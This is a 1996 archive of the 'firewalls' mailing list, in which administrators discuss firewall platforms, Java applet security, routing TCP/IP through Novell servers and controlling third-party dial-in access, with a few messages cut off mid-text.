address kernel bugs with security implications? it may not have been running a firewall, but about a year ago a well known developer of Internet software took even more security precautions after his public ftp host was broken in via what was described as a kernel bug in BSDi. I'm sure that bug got fixed quickly. cheers, Danny Thomas From firewalls-owner Thu Feb 8 15:49:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA22184 for firewalls-outgoing; Thu, 8 Feb 1996 15:03:07 -0800 (PST) Received: from abainet.abacus.ch (abainet.abacus.ch [193.246.120.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA27370 for ; Thu, 8 Feb 1996 06:59:50 -0800 (PST) Received: from cc:Mail (PU Serial #1590) by abainet.abacus.ch (PostalUnion/SMTP(tm) v2.1.8d for Windows NT(tm)) id AA-1996Feb08.154211.1590.2773; Thu, 08 Feb 1996 16:00:03 GMT From: Inverardi@abacus.ch (Remo Inverardi) To: firewalls@greatcircle.com (firewalls) Message-ID: <1996Feb08.154211.1590.2773@abainet.abacus.ch> X-Conversion-ID: X-Mailer: cc:Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: ABACUS Research AG, Rorschacherstr. 170, 9006 St. Gallen / Switzerland Date: Thu, 08 Feb 1996 16:00:03 GMT Subject: Re[2]: routing table go through firewall ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just a little question that doesn't belong here, but who cares? ;) (you? sorry.) We want to run IPX/SPX and TCP/IP on the same network (over the same cable). Now the problem is, that there are several Novell Servers between us and the router that does connect us to the internet. Those Novell Servers seem to only pass on IPX/SPC packets and filter all TCP/IP traffic out. Where's the problem? Do we need to install any NLMs or something similar? bye and thanks for your help. iNVi. ---------------------------------------------------------------------- Remo Inverardi - Voice +41 61 811 14 82 - Fax and BBS +41 61 811 14 42 ABACUS Software Research AG - Rorschacherstr. 170 - CH-9006 St. Gallen ---------------------------------------------------------------------- From firewalls-owner Thu Feb 8 15:54:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA23606 for firewalls-outgoing; Thu, 8 Feb 1996 15:41:07 -0800 (PST) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA23598 for ; Thu, 8 Feb 1996 15:41:03 -0800 (PST) Received: from maestro.Maestro.COM by relay1.UU.NET with SMTP id QQaccc23676; Thu, 8 Feb 1996 18:39:52 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA12432; Thu, 8 Feb 96 18:29:29 EST Date: Thu, 8 Feb 1996 18:29:29 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: SickPuppyChow 1-96 Part Six Section Four Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Section 4 - Dawg stuff From: Patrick M. Bartkus <102557.3370@compuserve.com> There are only two kinds of dogs - big dogs (good) & "endust dogs" (all that they are good for is to spray them with Endust, kick them under the bed and if they don't get it clean, spray and kick again). From: 'Rabid Wombat' You'r still weird. (Sick Puppy Note: plucking the whiskers from a cat, Wombat loves me, Wombat loves me not ...) From: Bob Resino Now go away and pee on a tree or something.... ;-) From firewalls-owner Thu Feb 8 16:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA22439 for firewalls-outgoing; Thu, 8 Feb 1996 15:07:35 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA22434 for ; Thu, 8 Feb 1996 15:07:29 -0800 (PST) Received: from maestro.Maestro.COM by relay3.UU.NET with SMTP id QQacca09923; Thu, 8 Feb 1996 18:06:40 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA11489; Thu, 8 Feb 96 17:56:03 EST Date: Thu, 8 Feb 1996 17:56:03 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: SickPuppyChow 1-96, Part One Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Following posting is made with permission of the owner of the list. His Excellency Sick Puppy offers special thanks to a company that wishes to remain unidentified, to the BugFinder General of the BBC and to Russ Cooper, a consultant. Sick Puppy is grateful to all the other contributors as well. The posting has seven parts which contain four sections. 1. Windows 95/NT security problems. (Short Part1) 2. Windows 95/NT clobbering firewall DNS. (Long Part 2, 3, 4) 3. Windows 95/NT clobbering themselves and neighbors. (Long Part 5) 4. Dawg stuff (Short Part6) Section 1 Windows 95/NT security problems Doesn't really belong on firewalls. Follow the web links. Configuring Windows 95 hFrom firewalls-owner Fri Feb 9 02:09:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA03184 for firewalls-outgoing; Fri, 9 Feb 1996 02:01:34 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA03139 for ; Fri, 9 Feb 1996 02:01:14 -0800 (PST) Message-Id: <199602091001.CAA03139@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA284470079; Fri, 9 Feb 1996 21:01:19 +1100 From: Darren Reed Subject: Re: NT's TCP/IP stack To: ewoodrick@ed-com.com (Ed Woodrick) Date: Fri, 9 Feb 1996 21:01:19 +1100 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Ed Woodrick" at Feb 8, 96 09:48:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Ed Woodrick, sie said: [...] > There are some UNIX platforms that can't do that. Many UNIX systems = > haven't reached the C2 level, with or without network adapters. So don't build a firewall around one without (at least) C2 certification, if that really bothers you. In my experience, C2 auditting is often more trouble than its worth. [...] > So if I were to look at the number of break-ins on all platforms, = > besides Windows 3.X and Windows 95 which don't really implement = > industrial strength security, I would have to say that UNIX has had more = > break-in's than anything else. People have had many years of learning = > how to hack it. UNIX's inherent remote operation lends itself to = > security breaches. Heck, just let a sniffer watch people logon. The number of breakins/security breaches to an Operating system should not be a factor when choosing a platform to run a firewall. You should not be running any of these services, for starters, on such a system. Doing so and it being a threat (ie allowing anyone shell access to it using standard login procedures) is a flaw in your firewall construction/design - irrespective of whether it is Unix or NT/Win95. The problem with Unix is has been designed to make it easy to network computers, use them together, remotely, etc. The problem is that the tools which were written to do this generally didn't make security a prime consideration, and nor had the amount of research that has now been done in this field, been done then. There are, however, very good alternatives available for Unix which address, if not solve, many of these problems, including passwords being sent over the network for logins (Kerberos). [...] > As to what is the best platform to implement a firewall, my choice would = > be something that people don't know a lot about. A DOS or custom OS is = > probably a pretty good choice. UNIX, to me, is probably the worse = > choice. Too many people love to hack UNIX. And the internal works are = > too well known. It's real easy to hack something when you have the = > complete source available. I guess this depends on how you view what your firewall is, for you. If you want to be straightjacketed into few choices and limitations in what you can do, sure, buy your custom OS. However, that flexibility of having source code, being able to hack at it yourself, provides you with much more power in making sure that what you have is the right tool. Wouldn't it be nice to be able to buy MS Word and put it together yourself, so you could leave out bits like Macros ? If I was going to bother getting a custom OS, I'd be making sure it had been designed right, with security in mind from the start of the project rather than security being an add-on, which is what it must be for NT and Win95. Maybe buying Trusted Solaris and using Firewall-1 would be the go, or one of the other B-rated firewall operating systems. darren From firewalls-owner Fri Feb 9 03:55:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA07599 for firewalls-outgoing; Fri, 9 Feb 1996 03:36:39 -0800 (PST) Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA07561 for ; Fri, 9 Feb 1996 03:33:51 -0800 (PST) Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id LAA07000 for ; Fri, 9 Feb 1996 11:32:59 GMT Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id LAA08561 for ; Fri, 9 Feb 1996 11:32:56 GMT From: Danny Cox Date: Fri, 9 Feb 1996 11:33:06 GMT Message-Id: <472.9602091133@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Advice please - doing without an inner router on a secured subnet X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Fri, 9 Feb 1996 05:37:24 -0800 (PST) Received: by mailgate.bigyellow.com (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA5789; Fri, 09 Feb 96 08:36:49 -0500 Message-Id: <9602091336.AA5789@mailgate.bigyellow.com> Received: from NIRC with "Lotus Notes Mail Gateway for SMTP" id 043A6F4638D1CF01852562CB0049799E; Fri, 9 Feb 96 08:36:48 To: firewalls From: "Donna O'Connell" Date: 9 Feb 96 8:24:42 Subject: security checks Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for a list or a good web site discussing security audits of networks, firewalls and systems. Does anyone out there have some good info? Thanks, Donna O'Connell NYNEX From firewalls-owner Fri Feb 9 06:06:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA12104 for firewalls-outgoing; Fri, 9 Feb 1996 05:50:18 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA12099 for ; Fri, 9 Feb 1996 05:50:14 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id IAA17578; Fri, 9 Feb 1996 08:49:29 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id IAA12491; Fri, 9 Feb 1996 08:49:26 -0500 (EST) Date: Fri, 9 Feb 1996 08:49:26 -0500 (EST) From: "Paul D. Robertson" To: Jeff Murphy cc: firewalls@GreatCircle.COM Subject: Re: JAVA security problem ? In-Reply-To: <199602090828.DAA28812@smurfland.cit.buffalo.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, Jeff Murphy wrote: > (as far as i know) in the current incarnation of java (beta) that is > available via the netscape browser.. applets are restricted to opening > socket connections back to the server from whence they came only. i think > this would foil an applets attempt to open a socket to your screening > router (presumably in an attempt to muck with its configuration). Any idea on how this works in a proxy environment? I'd expect it to attempt to open the socket on the proxy, since the proxy doesn't know about Java. That's not a good thing at all. I also wonder how the Sun implementation handles this. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Feb 9 06:11:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA12542 for firewalls-outgoing; Fri, 9 Feb 1996 06:01:41 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA12537 for ; Fri, 9 Feb 1996 06:01:35 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id IAA15425; Fri, 9 Feb 1996 08:58:01 -0500 Date: Fri, 9 Feb 1996 08:57:58 -0500 (EST) From: Rabid Wombat To: Russ cc: "'Dick_Wall@stratus.com'" , "'Firewalls'" Subject: RE: Non-company Access ?? In-Reply-To: <01BAF66E.3517D620@rwcooper.rc.toronto.on.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 8 Feb 1996, Russ wrote: > If it really is such a large requirement, what about setting up separate > modems to handle specific requirements. For example, Modem A is allowed to > go to Host A for Protocols X,Y, and Z ? Modem B goes to Host B for > Protocols X, Y, and Z ? and so on. > > Cheers, > Russ Cooper - Senior Consultant - Internet > SHL/Computer Innovations - Consulting Services > "Do you have the vision to see my future as I projected it?" > > You might want to look into using a terminal server and setting up account restrictions that way. I've used the Livingston Portmaster for this purpose and been happy with the results. Where you set it up will depend on your requirements, but a seperate segment off the screening router should be considered. Block accesss from "outside" to the term server based on addresses, and block access to outside from the term server based on addresses at the screening router. Most term servers can also be set up for dial-back, and you could add encrytion-modems if really paranoid. Also - look into Radius in conjunction with the Livingston terminal server. We're planning on implementing that approach at a site with dial-in requirements similar to what you've described (thanks to all on the list who gave positive feedback on their experiences with this). Depending on what you're passing through from the term server, you may need to put up a second firewall, one for access to outside and one just to screen the TS, instead of what's below: |-------------| outside |--------|--------------| term server | ------------| router | |-------------| |----|---| | |----------| |--------| firewall |------------ inside |----------| Comments? Anyone see weakness with the above? Has anyone come up with a better alternative? - R.W. From firewalls-owner Fri Feb 9 06:39:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA13023 for firewalls-outgoing; Fri, 9 Feb 1996 06:23:26 -0800 (PST) Received: from cpmx.saic.com (cpmx.saic.com [139.121.16.80]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA13018 for ; Fri, 9 Feb 1996 06:23:22 -0800 (PST) Received: from cpqm.saic.com by cpmx.saic.com; Fri, 9 Feb 96 06:15:07 -0800 Message-ID: Date: 9 Feb 1996 09:09:45 U From: "Ashley Miller" Subject: Comprehensive FAQ on f-wall To: "Firewalls" X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All: Does anyone know of any comprehensive FAQ's on the basics of firewall installation? I realize that the devil is in the details (per vendor or individual firewall) but I'm really interested in finding a resource which could guide me through all of the issues I will encounter and that defines terms in a way that mgmt understands. Thanks, Ashley Miller From firewalls-owner Fri Feb 9 06:55:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA13228 for firewalls-outgoing; Fri, 9 Feb 1996 06:29:46 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA13222 for ; Fri, 9 Feb 1996 06:29:39 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id JAA15458; Fri, 9 Feb 1996 09:26:08 -0500 Date: Fri, 9 Feb 1996 09:26:05 -0500 (EST) From: Rabid Wombat To: H Barnett cc: firewalls Subject: Re: Re[2]: routing table go through firewall ? In-Reply-To: <311AEBBE.6831@fastlane.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > ----------------------------------------------------------------------The Novell MPR software can be installed on the Server to provide routing > of the TCP/IP traffic. This will add overhead to the servers and the > filtering of on the router leaves a lot to be desired, however your > packets will pass. MPR works on 3.x and 4.x servers (nor 2.x) > You can pass IP packets through with IP Forward=Yes. MPR will add more features, but you can get by without it. From firewalls-owner Fri Feb 9 07:00:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA13496 for firewalls-outgoing; Fri, 9 Feb 1996 06:45:25 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA13491 for ; Fri, 9 Feb 1996 06:45:19 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id LAA12847 for ; Fri, 9 Feb 1996 11:18:44 -0500 Message-ID: <311B5DCD.3B63@fc.com> Date: Fri, 09 Feb 1996 09:44:29 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Would anyone know how to route www.foobar.com Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from an active DNS server? Where in the named file & what format is it in? thanks- ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Fri Feb 9 07:09:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA14036 for firewalls-outgoing; Fri, 9 Feb 1996 07:05:53 -0800 (PST) Received: from maildrop.micrognosis.com (supernova.micrognosis.com [192.233.13.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA14031 for ; Fri, 9 Feb 1996 07:05:47 -0800 (PST) Received: by maildrop.micrognosis.com (4.1/SMI-4.1) id AA05152; Fri, 9 Feb 96 10:04:50 EST Received: from singhi.corp.micrognosis.com(193.32.166.28) by supernova.micrognosis.com via smap (V1.3) id sma005091; Fri Feb 9 10:04:34 1996 Received: from java (java.corp.micrognosis.com) by corp.micrognosis.com (4.1/1.0-integ.cf) id AA19610; Fri, 9 Feb 96 10:08:08 EST Received: from java by java (SMI-8.6/SMI-SVR4) id KAA05077; Fri, 9 Feb 1996 10:09:53 -0500 Message-Id: <311B63C1.37CB@corp.micrognosis.com> Date: Fri, 09 Feb 1996 10:09:53 -0500 From: Adam Jack Organization: CSK/Micrognosis Inc. X-Mailer: Mozilla 2.0b6a (X11; I; SunOS 5.5 sun4m) Mime-Version: 1.0 To: "Paul D. Robertson" Cc: firewalls@greatcircle.com Subject: Re: JAVA security problem ? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul D. Robertson wrote: > > > [...] applets are restricted to opening > > socket connections back to the server from whence they came only. > > Any idea on how this works in a proxy environment? I'd expect it to > attempt to open the socket on the proxy, [...] Java socket support has no concept of, or handling for, a proxy. If an applet tries to connect home from within such an environment it will fail for the same reasons that any other IP connect would fail. It makes writting such an applet next to pointless if it is intended for internet (as opposed to intranet) activities. Adam -- +1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html ajack@corp.micrognosis.com -> ajack@netcom.com -> ajack@?.??? From firewalls-owner Fri Feb 9 07:23:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA14150 for firewalls-outgoing; Fri, 9 Feb 1996 07:10:14 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA14145 for ; Fri, 9 Feb 1996 07:10:09 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id JAA01829; Fri, 9 Feb 1996 09:02:13 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma001827; Fri Feb 9 09:02:11 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA02496 (5.67b/IDA-1.5); Fri, 9 Feb 1996 09:16:19 -0600 Date: Fri, 9 Feb 1996 09:16:19 -0600 From: Ken Hardy Message-Id: <199602091516.AA02496@ignatz.bridge.com> To: proberts@clark.net Subject: Re: JAVA security problem ? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I trow "Paul D. Robertson" spake thusly in sooth: >> (as far as i know) in the current incarnation of java (beta) that is >> available via the netscape browser.. applets are restricted to opening >> socket connections back to the server from whence they came only. i think >> this would foil an applets attempt to open a socket to your screening >> router (presumably in an attempt to muck with its configuration). > >Any idea on how this works in a proxy environment? I'd expect it to >attempt to open the socket on the proxy, since the proxy doesn't know >about Java. That's not a good thing at all. I also wonder how the Sun >implementation handles this. The most straightforward way I see of getting this to work through a bastion host is to use Socks. Netscape has a setting for Socks configuration. Interesting thought: I don't see a lot of damage possible if the applet can _only_ talk to the originating host and the GUI components of the browser, but it would be a neat way to steal CPU cycles for a massive parallel factoring project, e.g.; get a large portion of the worldwide internet community to run your extremely useful and seemingly harmless applet, and have it do a little factoring on the side, sending the results back over its safe little socket. How long does it take a million machines to crack a 40-bit RC4 password, albeit not with machine code? :-O - KH From firewalls-owner Fri Feb 9 07:38:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA14481 for firewalls-outgoing; Fri, 9 Feb 1996 07:20:08 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA14475 for ; Fri, 9 Feb 1996 07:20:01 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id KAA06870; Fri, 9 Feb 1996 10:19:05 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id KAA02105; Fri, 9 Feb 1996 10:18:30 -0500 (EST) Date: Fri, 9 Feb 1996 10:18:29 -0500 (EST) From: "Paul D. Robertson" To: Ken Hardy cc: firewalls@greatcircle.com Subject: Re: JAVA security problem ? In-Reply-To: <199602091516.AA02496@ignatz.bridge.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, Ken Hardy wrote: > I trow "Paul D. Robertson" spake thusly in sooth: > > >> (as far as i know) in the current incarnation of java (beta) that is > >> available via the netscape browser.. applets are restricted to opening > >> socket connections back to the server from whence they came only. i think > >> this would foil an applets attempt to open a socket to your screening > >> router (presumably in an attempt to muck with its configuration). > > > >Any idea on how this works in a proxy environment? I'd expect it to > >attempt to open the socket on the proxy, since the proxy doesn't know > >about Java. That's not a good thing at all. I also wonder how the Sun > >implementation handles this. > > The most straightforward way I see of getting this to work through a > bastion host is to use Socks. Netscape has a setting for Socks > configuration. > I haven't used Socks, but doesn't this mean that any application protocol can talk out over that connection? I don't want my users running anything that hasn't been approved. With a proxy, at least I'm assured that its HTTP that's being spoken. > Interesting thought: I don't see a lot of damage possible if the applet > can _only_ talk to the originating host and the GUI components of the Depends on what's running on the host, and what it's connected to. I can imagine lots of bad things, which would take evil code, but then that seems to be a matter of putting "click here" on a page now-a-days. Your Paranioa May Vary Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Feb 9 07:58:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15563 for firewalls-outgoing; Fri, 9 Feb 1996 07:50:10 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA15558 for ; Fri, 9 Feb 1996 07:50:06 -0800 (PST) Received: from vodka.sse.att.com by ig4.att.att.com id AA11682; Fri, 9 Feb 96 10:42:04 EST Message-Id: <9602091542.AA11682@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: JAVA security problem ? To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy) Date: Fri, 9 Feb 1996 10:50:36 -0500 (EST) Cc: Firewalls@greatcircle.com In-Reply-To: <199602090828.DAA28812@smurfland.cit.buffalo.edu> from "Jeff Murphy" at Feb 9, 96 03:28:39 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >There exist a possibility for a Java applet to open up a outbound socket > >connection (I have not verified this myself) from the Browser. If the > > > > [...] > > > >Examples that spring to my mind is to attack a screening router from > >within a trusted network, launch rsh commands that otherwise would not > > (as far as i know) in the current incarnation of java (beta) that is > available via the netscape browser.. applets are restricted to opening > socket connections back to the server from whence they came only. i think > this would foil an applets attempt to open a socket to your screening > router (presumably in an attempt to muck with its configuration). > > An how do they know from whence they came? Do I smell an IP spoofing attack? Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Feb 9 08:10:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15463 for firewalls-outgoing; Fri, 9 Feb 1996 07:46:40 -0800 (PST) Received: from burdell.cc.gatech.edu (burdell.cc.gatech.edu [130.207.3.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA15455 for ; Fri, 9 Feb 1996 07:46:33 -0800 (PST) Received: from gaia.cc.gatech.edu (aleach@gaia.cc.gatech.edu [130.207.3.8]) by burdell.cc.gatech.edu (8.7.1/8.6.9) with ESMTP id KAA12851 for ; Fri, 9 Feb 1996 10:45:42 -0500 (EST) Received: (from aleach@localhost) by gaia.cc.gatech.edu (8.7.1/8.6.9) id KAA17623; Fri, 9 Feb 1996 10:45:40 -0500 (EST) Date: Fri, 9 Feb 1996 10:45:40 -0500 (EST) From: Alfred Grahame Leach To: Firewalls@GreatCircle.COM Subject: firewall product evaluation Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, I'm a graduate student at Georgia Institute of Technology, taking a network security course. I'm working on a project to choose a firewall product for a medium-sized company, and I was wondering if anyone had any suggestions or leads to find firewall product reviews. Any info would be _really_ appreciated. Feel free to email me directly at: aleach@cc.gatech.edu Thanks, in advance for any help! -Al Leach (aleach@cc.gatech.edu) =============================================================================== =============================================================================== //|| // // //==== //|| //==\\ // // // || // // // // || // // // // || // // //=== // || // //====// //===|| // // // //===|| // // // // || // // // // || // // // // || //====== //====== //==== // || //===// // // =============================================================================== =============================================================================== From firewalls-owner Fri Feb 9 08:24:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA14506 for firewalls-outgoing; Fri, 9 Feb 1996 07:21:42 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA14501 for ; Fri, 9 Feb 1996 07:21:37 -0800 (PST) Received: from pm2-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00325; Fri, 9 Feb 96 10:20:34 -0500 Date: Fri, 9 Feb 96 10:20:34 -0500 Message-Id: <9602091520.AA00325@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: Non-company Access ?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Verily at 05:27 PM 2/8/96 -0500, Dick Wall did write: >In a few words .. can anyone tell me how your companies handle requests >for third party access to your networks ? Yes - Delicately. 8^) Politely try to stall them while feverishly searching for a way which helps them meet their business objectives while meeting your security standards. >I get frequent requests to provide PPP or SLIP access to contractors, >vendors, resellers, distributors, etc. for the purpose of accessing all >sorts of applications and data bases. I also get requests to "open a >hole in the firewall" to allow these folks to access our facilities. Stick to your guns and don't grant the requests for PPP/SLIP connections (this will bypass your firewall) or opening the hole in the firewall. If you have no choice and absolutely have to open up a hole in your firewall, at the very least have an encrypted link between the person on the outside and your firewall. You are still back to the problem that you don't know what is on the other side of the incoming connection (just how secure is their network really?). There are worse things though. Within the last couple of months, I talked to a rather large ISP (which shall remain nameless), which manages customers firewalls by telneting into the firewall without using an encrypted link. What is just as bad, they took my word that I had the approval of the other person to be asking for their firewall access rules. (Fortunately, I'm one of the good guys & was telling the truth). >We don't "open holes", but we do register dial access accounts. (Too >many of them to make me feel comfortable). All it takes is one dial-in account to clean your clock (particularly with a SLIP/PPP connection over an ISP). >Generally, we can't restrict acces on a machine basis. The requests >typically are for access to a broad base of systems. Furthermore, once >they are on those systems, they are free to then access other machines >that the filters won't catch. This is a tough one. I would need know more details to help you solve this one - preferrably off-line. Feel free to give me a call at the number below. >What do you all do ?? > >Do you allow non-company access ? Preferrably not. When it is unavoidable, isolate the LAN, and only then let them onto the isolated LAN (with the appropriate NDAs, of course). >Do you move all the systems to be accessed to a secure LAN ? Usually. Try to contain the damage as much as possible (before it happens). >If you allow compnay A to connect to you, how do you prevent company B >(which happens to be connected behind company A) from logging onto the >"A" machine and passing into your net ? (The ususal response I get on >this one is "trust" company A ... they won't let company B do that .. ) IMO, you hit the nail on the head with this one. (Your accurate understanding of the problem at hand is rather refreshing.) Many people overlook the problems (& ramifications thereof) that you mentioned. It is important to get those who are requesting the connection to to understand the business and security risks of what they are proposing. Grab a couple of recent case histories (GE, Citibank, etc) & point out that what happened to their organization could also happen to yours. Also, a worm on their network would also carry over to your network, etc. How do you know that the person logging into your system doesn't have hacking as their hobby? Or that the images which aren't being uploaded don't contain trojan horses or viruses? >All input is appreciated ... > >Dick The situations you posed are difficult ones. I have handled them before. If I can help you at all, please feel free to call me. Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - 